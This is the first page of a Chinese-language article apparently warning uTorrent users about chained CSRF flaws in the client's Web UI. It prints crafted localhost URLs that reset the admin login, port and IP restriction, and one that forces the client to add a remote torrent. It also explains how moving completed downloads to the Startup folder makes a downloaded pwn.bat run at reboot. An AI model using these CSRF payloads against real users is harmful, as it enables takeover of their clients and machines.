uTorrent是一款优秀的BT下载客户端软件,它具有个头小巧,界面清爽,下载速度快等诸多优点,所以广受喜欢用BT下载的用户的欢迎。但是,我想要说的是,亲爱的uTorrent用户们,小心了,黑客正在向我们袭来……
人们已经发现了几个CSRF漏洞,将它们组合起来就能对uTorrent的Web用户界面及其底层的系统造成破坏性的打击——攻击者不仅可以强迫uTorrent下载任意的torrents文件,还能把下载后的文件移动到系统中的任意目录下,并最终完全控制受害者的计算机。下面开始介绍黑客们的攻击手法。
一、篡改登录信息
眼下,有越来越多的软件开始采用Web 应用程序接口,例如BitTorrent客户端就是一个很好的例子。人们始料未及的是,web接口通常易于受到攻击,攻击者利用web接口的最大困难只是难于获悉web接口的精确位置。 虽然远程执行代码也是可能的,但是这并非一个非常严重的安全漏洞,因为它难以利用。所以,针对BitTorrent客户端的攻击数量将超过对BitTorrent服务器的攻击。
下面我们详细介绍如何通过跨站请求伪造技术来修改uTorrent的Web用户界面登录信息。我们知道,利用CSRF可以修改Web用户界面所需的用户名和口令,但是攻击者要想修改这些用户名和口令的话,前提是用户已经登录——但是这对于攻击者来说并非难事,通过社交工程就能达到这一目的。
好了,现在假设用户已经登录,那么利用下列精心构造的URL,攻击者就能修改uTorrent管理员登录信息:
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096
构造好上述的陷阱后,攻击者所要做的只是诱骗用户点击这些URL。当然,攻击者不会傻到直接将这些链接信息暴露给用户,他们可以通过多种方法来做掩护。当更改用户名和密码之后,浏览器必须重新进行身份验证,方法如下:
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1
二、强迫uTorrent执行下载的文件
利用CSRF可以修改Web用户界面所需的用户名和口令,但是攻击者要想修改这些用户名和口令的话,前提是用户已经登录——但是这对于攻击者来说并非难事,通过社交工程就能达到这一目的。对于本文所介绍的攻击,我们假设用户已经通过了uTorrent的Web用户界面的身份验证。
首先,攻击者需要设法让选择的文件进入一个计算机,更重要的是,攻击者还得设法把它放在他们指定的目录中。我们看一下正常情况下,用户是如何为下载的文件指定存放目录的。我们需要打开uTorrent的“Move completed downloads to”选项。
图1 |
然后,我们还得告诉uTorrent将下载好的文件移动到哪一个目录下。
图2 指定目录 |
我们知道,利用跨站请求伪造技术,攻击者能够以用户的身份来行事,因为前面我们已经假设用户已经登录到客户端了。所以,攻击者所要做的只是设法让用户点击上图中的URL即可,如下所示:
这时,他们的uTorrent的下载首选项现在将变成下面的样子:
图3 修改后的首选项 |
这样的话,下载后的文件将被移动到All Users的启动文件夹,并且只要攻击者能够强迫用户下载文件,实际上他们就已经得手了。例如,攻击者可以通过下列方法来强迫用户下载一个torrent文件:
http://localhost:14774/gui/?action=add-url&s=http://www.whatever.com/file.torrent
假设该torrent文件让uTorrent下载一个名为pwn.bat的文件。下载一旦完成,pwn.bat就会位于启动文件夹,所以当用户重新引导系统时该文件就会被执行。但是等一下,情况还会更糟……
共2页: 1 [2] 下一页 | ||||
|